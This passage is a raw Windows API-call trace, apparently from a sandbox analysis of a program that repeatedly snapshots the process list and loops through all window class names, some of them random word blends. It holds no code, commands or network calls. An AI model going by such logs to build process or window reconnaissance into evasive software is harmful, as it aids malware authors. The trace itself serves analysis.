lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.764] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x634 [0159.769] Process32First (in: hSnapshot=0x634, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0162.523] Process32First (in: hSnapshot=0x644, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0164.808] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x634 [0164.813] Process32First (in: hSnapshot=0x634, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.198] Process32First (in: hSnapshot=0x604, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x42c [0175.201] Process32First (in: hSnapshot=0x42c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.576] Process32First (in: hSnapshot=0x42c, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.316] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x628 [0193.320] Process32First (in: hSnapshot=0x628, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.699] Process32First (in: hSnapshot=0x628, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0210.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x628 [0210.410] Process32First (in: hSnapshot=0x628, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.138] Process32First (in: hSnapshot=0x628, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.024] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x628 [0215.029] Process32First (in: hSnapshot=0x628, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.846] Process32First (in: hSnapshot=0x608, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.635] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x370 [0223.640] Process32First (in: hSnapshot=0x370, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0245.326] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x520 [0245.331] Process32First (in: hSnapshot=0x520, lppe=0x754f630 | out: lppe=0x754f630*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 190 os_tid = 0x8c8 [0141.280] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) returned 1 [0141.282] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="ATL:000007FEF55B52C0") returned 20 [0141.282] GetClassNameA (in: hWnd=0x2010a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0141.282] GetClassNameA (in: hWnd=0x20080, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.282] GetClassNameA (in: hWnd=0x2006a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.282] GetClassNameA (in: hWnd=0x2012c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.282] GetClassNameA (in: hWnd=0x20134, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.282] GetClassNameA (in: hWnd=0x2012e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.282] GetClassNameA (in: hWnd=0x200f4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.283] GetClassNameA (in: hWnd=0x20128, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.283] GetClassNameA (in: hWnd=0x20126, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.283] GetClassNameA (in: hWnd=0x4015a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.283] GetClassNameA (in: hWnd=0x30144, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Button") returned 6 [0141.283] GetClassNameA (in: hWnd=0x40140, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0141.283] GetClassNameA (in: hWnd=0x60096, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.283] GetClassNameA (in: hWnd=0x400e8, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.283] GetClassNameA (in: hWnd=0x400c2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.283] GetClassNameA (in: hWnd=0x800de, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.283] GetClassNameA (in: hWnd=0x200e2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0141.283] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.283] GetClassNameA (in: hWnd=0x20028, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.283] GetClassNameA (in: hWnd=0x400ec, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0141.283] GetClassNameA (in: hWnd=0x4004a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0141.283] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0141.283] GetClassNameA (in: hWnd=0x2004e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0141.283] GetClassNameA (in: hWnd=0x300fa, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0141.283] GetClassNameA (in: hWnd=0x400a6, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0141.283] GetClassNameA (in: hWnd=0x20054, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="ATL:000007FEFBD041F0") returned 20 [0141.283] GetClassNameA (in: hWnd=0x20090, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0141.284] GetClassNameA (in: hWnd=0x20084, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.284] GetClassNameA (in: hWnd=0x20070, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.284] GetClassNameA (in: hWnd=0x20086, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.284] GetClassNameA (in: hWnd=0x400c6, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.284] GetClassNameA (in: hWnd=0x400ca, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0141.284] GetClassNameA (in: hWnd=0x400b4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0141.284] GetClassNameA (in: hWnd=0x400aa, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.284] GetClassNameA (in: hWnd=0x400da, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.284] GetClassNameA (in: hWnd=0x500e4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.284] GetClassNameA (in: hWnd=0x400b2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0141.284] GetClassNameA (in: hWnd=0x6008a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0141.284] GetClassNameA (in: hWnd=0x2010c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.284] GetClassNameA (in: hWnd=0x20114, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.284] GetClassNameA (in: hWnd=0x2012a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.284] GetClassNameA (in: hWnd=0x2014c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.284] GetClassNameA (in: hWnd=0x2008e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.284] GetClassNameA (in: hWnd=0x20156, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0141.284] GetClassNameA (in: hWnd=0x4013c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0141.284] GetClassNameA (in: hWnd=0x60098, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0141.285] GetClassNameA (in: hWnd=0x6009c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0141.285] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="populationopenings") returned 18 [0141.285] GetClassNameA (in: hWnd=0x401ba, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0141.285] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Doctrine_alcohol_win") returned 20 [0141.285] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="sensorsDemocratcls") returned 18 [0141.285] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Const_advertisement_window") returned 26 [0141.285] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="BagsShakiratourismwnd") returned 21 [0141.285] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="dallasRwnd") returned 10 [0141.285] GetClassNameA (in: hWnd=0x10196, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="wooden") returned 6 [0141.285] GetClassNameA (in: hWnd=0x10192, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="SpiceDespitecls") returned 15 [0141.285] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="smithwin") returned 8 [0141.285] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="zoo_differ_cls") returned 14 [0141.285] GetClassNameA (in: hWnd=0x10186, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="ruby_") returned 5 [0141.285] GetClassNameA (in: hWnd=0x10182, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="birthbeanclass") returned 14 [0141.285] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="objectsvirusIsraeli") returned 19 [0141.285] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="seekerapp") returned 9 [0141.285] GetClassNameA (in: hWnd=0x10176, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="potentiallywin") returned 14 [0141.285] GetClassNameA (in: hWnd=0x10172, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Wheneverwnd") returned 11 [0141.285] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="knewDifferenceskarenwnd") returned 23 [0141.286] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Definitelycls") returned 13 [0141.286] GetClassNameA (in: hWnd=0x10166, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="receptor_paintings_cls") returned 22 [0141.286] GetClassNameA (in: hWnd=0x10162, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="beveragesTapesdodclass") returned 22 [0141.286] GetClassNameA (in: hWnd=0x60110, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="abortion_Serbia_effect_") returned 23 [0141.286] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0141.286] GetClassNameA (in: hWnd=0x20020, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="#43") returned 3 [0141.286] GetClassNameA (in: hWnd=0x10058, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0141.286] GetClassNameA (in: hWnd=0x30044, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0141.286] GetClassNameA (in: hWnd=0x20018, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0141.286] GetClassNameA (in: hWnd=0x30062, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0141.286] GetClassNameA (in: hWnd=0x600a0, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0141.286] GetClassNameA (in: hWnd=0x20108, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.286] GetClassNameA (in: hWnd=0x20148, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0141.286] GetClassNameA (in: hWnd=0x4013e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.286] GetClassNameA (in: hWnd=0x40112, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.286] GetClassNameA (in: hWnd=0x2005c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.286] GetClassNameA (in: hWnd=0x20066, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.286] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.286] GetClassNameA (in: hWnd=0x501bc, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x1019c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10198, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10194, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10190, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10188, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10184, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10180, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10178, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10174, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10170, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10168, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10164, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.287] GetClassNameA (in: hWnd=0x10160, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.288] GetClassNameA (in: hWnd=0x700a4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.288] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.288] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.288] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.288] GetClassNameA (in: hWnd=0x20076, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0141.288] GetClassNameA (in: hWnd=0x6009a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.288] GetClassNameA (in: hWnd=0x2005e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="IME") returned 3 [0141.288] Sleep (dwMilliseconds=0x64) [0141.391] EnumWindows (lpEnumFunc=0x5564058, lParam=0x54c0000) returned 1 [0141.391] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="ATL:000007FEF55B52C0") returned 20 [0141.392] GetClassNameA (in: hWnd=0x2010a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0141.392] GetClassNameA (in: hWnd=0x20080, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x2006a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.392] GetClassNameA (in: hWnd=0x2012c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x20134, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x2012e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x200f4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x20128, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x20126, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x4015a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x30144, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Button") returned 6 [0141.392] GetClassNameA (in: hWnd=0x40140, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0141.392] GetClassNameA (in: hWnd=0x60096, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x400e8, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x400c2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x800de, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.392] GetClassNameA (in: hWnd=0x200e2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0141.392] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.392] GetClassNameA (in: hWnd=0x20028, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0141.392] GetClassNameA (in: hWnd=0x400ec, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0141.393] GetClassNameA (in: hWnd=0x4004a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0141.393] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0141.393] GetClassNameA (in: hWnd=0x2004e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0141.393] GetClassNameA (in: hWnd=0x300fa, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0141.393] GetClassNameA (in: hWnd=0x400a6, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0141.393] GetClassNameA (in: hWnd=0x20054, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="ATL:000007FEFBD041F0") returned 20 [0141.393] GetClassNameA (in: hWnd=0x20090, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0141.393] GetClassNameA (in: hWnd=0x20084, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.393] GetClassNameA (in: hWnd=0x20070, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.393] GetClassNameA (in: hWnd=0x20086, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.393] GetClassNameA (in: hWnd=0x400c6, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.393] GetClassNameA (in: hWnd=0x400ca, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0141.393] GetClassNameA (in: hWnd=0x400b4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0141.393] GetClassNameA (in: hWnd=0x400aa, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.393] GetClassNameA (in: hWnd=0x400da, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.393] GetClassNameA (in: hWnd=0x500e4, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.393] GetClassNameA (in: hWnd=0x400b2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0141.393] GetClassNameA (in: hWnd=0x6008a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0141.393] GetClassNameA (in: hWnd=0x2010c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.393] GetClassNameA (in: hWnd=0x20114, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.394] GetClassNameA (in: hWnd=0x2012a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.394] GetClassNameA (in: hWnd=0x2014c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0141.394] GetClassNameA (in: hWnd=0x2008e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0141.394] GetClassNameA (in: hWnd=0x20156, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0141.394] GetClassNameA (in: hWnd=0x4013c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0141.394] GetClassNameA (in: hWnd=0x60098, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0141.394] GetClassNameA (in: hWnd=0x6009c, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0141.394] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="populationopenings") returned 18 [0141.394] GetClassNameA (in: hWnd=0x401ba, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0141.394] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Doctrine_alcohol_win") returned 20 [0141.394] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="sensorsDemocratcls") returned 18 [0141.394] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="Const_advertisement_window") returned 26 [0141.394] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="BagsShakiratourismwnd") returned 21 [0141.394] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="dallasRwnd") returned 10 [0141.394] GetClassNameA (in: hWnd=0x10196, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="wooden") returned 6 [0141.394] GetClassNameA (in: hWnd=0x10192, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="SpiceDespitecls") returned 15 [0141.394] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x738f720, nMaxCount=260 | out: lpClassName="smithwin") returned 8 [0141.394] GetClassNameA 